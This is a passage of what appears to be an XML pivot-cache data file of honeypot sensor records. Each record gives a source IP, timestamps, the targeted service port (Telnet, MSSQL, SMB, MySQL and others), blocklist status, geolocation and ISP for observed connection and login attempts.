    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:963a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2104"/>
    <x v="2104"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T14:09:48"/>
    <d v="2025-04-12T14:09:48"/>
    <d v="2025-04-12T14:09:48"/>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d8:179c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2105"/>
    <x v="2105"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T14:00:58"/>
    <d v="2025-04-12T14:00:58"/>
    <d v="2025-04-12T14:00:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b61:94c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2106"/>
    <x v="2106"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T13:49:35"/>
    <d v="2025-04-12T13:49:35"/>
    <d v="2025-04-12T13:49:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:cd3a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2107"/>
    <x v="2107"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T13:44:17"/>
    <d v="2025-04-12T13:44:17"/>
    <d v="2025-04-12T13:44:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13725"/>
    <s v="101.693"/>
    <s v="4788"/>
    <s v="TTSSB-MY"/>
    <s v="Tm Technology Services Sdn Bhd"/>
    <s v="consumer"/>
    <s v="Adsl Streamyx"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e9f:705f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2108"/>
    <x v="2108"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T13:40:53"/>
    <d v="2025-04-03T19:58:27"/>
    <d v="2025-04-12T13:40:53"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="2011-03-24"/>
    <s v="CABLELITE"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a33:1694"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2109"/>
    <x v="2109"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T13:35:16"/>
    <d v="2025-04-12T13:35:16"/>
    <d v="2025-04-12T13:35:16"/>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3d02:a11d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2110"/>
    <x v="2110"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T13:20:59"/>
    <d v="2025-04-12T13:18:04"/>
    <d v="2025-04-12T13:20:59"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:613f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2111"/>
    <x v="2111"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T13:10:57"/>
    <d v="2025-02-20T15:26:17"/>
    <d v="2025-04-12T13:10:57"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="business"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7abb:66b2"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2112"/>
    <x v="2112"/>
    <s v="NA&amp;&amp;static-ip-21-167-66-202.rev.dyxnet.com"/>
    <x v="0"/>
    <d v="2025-04-12T12:57:42"/>
    <d v="2025-04-12T12:40:14"/>
    <d v="2025-04-12T12:57:42"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South Delhi"/>
    <s v="Aya Nagar"/>
    <s v="13157005"/>
    <s v="NA"/>
    <s v="28.472"/>
    <s v="77.1327"/>
    <s v="134337"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="business"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="2015-12-03"/>
    <s v="R2NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca42:a715"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2113"/>
    <x v="2113"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:51:19"/>
    <d v="2025-04-12T12:50:53"/>
    <d v="2025-04-12T12:51:19"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Namakkal"/>
    <s v="Komarapalayam"/>
    <s v="8223943"/>
    <s v="637209"/>
    <s v="11.4363"/>
    <s v="77.7232"/>
    <s v="58898"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="business"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a335:ce64"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2114"/>
    <x v="2114"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:48:04"/>
    <d v="2025-01-18T19:57:33"/>
    <d v="2025-04-12T12:48:04"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="22"/>
    <s v="Hormozgan"/>
    <s v="NA"/>
    <s v="Bandar Abbas"/>
    <s v="141681"/>
    <s v="NA"/>
    <s v="27.1832"/>
    <s v="56.2666"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Telecommunication Company of Hormozgan"/>
    <s v="2001-04-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d9db:79a2"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2115"/>
    <x v="2115"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:26:15"/>
    <d v="2025-04-12T08:16:41"/>
    <d v="2025-04-12T12:26:15"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="1080&amp;&amp;5432&amp;&amp;59121"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:cb27"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2116"/>
    <x v="2116"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:24:20"/>
    <d v="2025-04-07T09:08:38"/>
    <d v="2025-04-12T12:24:20"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-10-20"/>
    <s v="TLKM_BB_SERVICE_180_252_DIVRE2"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_SMB:Incoming connection (180.252.204.15,54076)}&amp;&amp;{Data_SMB:Incoming connection (180.252.204.15,55177)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4fc:cc0f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2117"/>
    <x v="2117"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:21:26"/>
    <d v="2025-03-01T19:50:37"/>
    <d v="2025-04-12T12:21:26"/>
    <n v="8535"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H12"/>
    <s v="3306&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="215730"/>
    <s v="H2NEXUS LTD"/>
    <s v="H2nexus LTD"/>
    <s v="hosting"/>
    <s v="H2nexus LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d78:89ec"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2118"/>
    <x v="2118"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:08:11"/>
    <d v="2025-04-08T12:21:09"/>
    <d v="2025-04-12T12:08:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kadıköy"/>
    <s v="Kızıltoprak"/>
    <s v="742935"/>
    <s v="NA"/>
    <s v="40.9802"/>
    <s v="29.042"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:51d6:f491"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2119"/>
    <x v="2119"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:07:43"/>
    <d v="2025-04-12T05:13:59"/>
    <d v="2025-04-12T12:07:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Bhavnagar"/>
    <s v="Bhavnagar (Shilpi Nagar)"/>
    <s v="1276032"/>
    <s v="364001"/>
    <s v="21.7699"/>
    <s v="72.1438"/>
    <s v="131215"/>
    <s v="116 MADHAV DARSHAN"/>
    <s v="for103."/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2015-05-05"/>
    <s v="ADCOMMUNICATION"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6738:b6c1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2120"/>
    <x v="2120"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:02:48"/>
    <d v="2025-04-12T12:02:22"/>
    <d v="2025-04-12T12:02:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.5506"/>
    <s v="77.2686"/>
    <s v="45184"/>
    <s v="DEN Networks Limited"/>
    <s v="DEN Networks Limited"/>
    <s v="business"/>
    <s v="broadband users in Delhi"/>
    <s v="2009-02-13"/>
    <s v="DEN-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:b2e8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2121"/>
    <x v="2121"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T12:01:20"/>
    <d v="2025-04-12T12:01:20"/>
    <d v="2025-04-12T12:01:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:1ff7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2122"/>
    <x v="2122"/>
    <s v="36-236-132-69.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-12T11:54:59"/>
    <d v="2025-04-11T13:37:55"/>
    <d v="2025-04-12T11:54:59"/>
    <n v="61"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
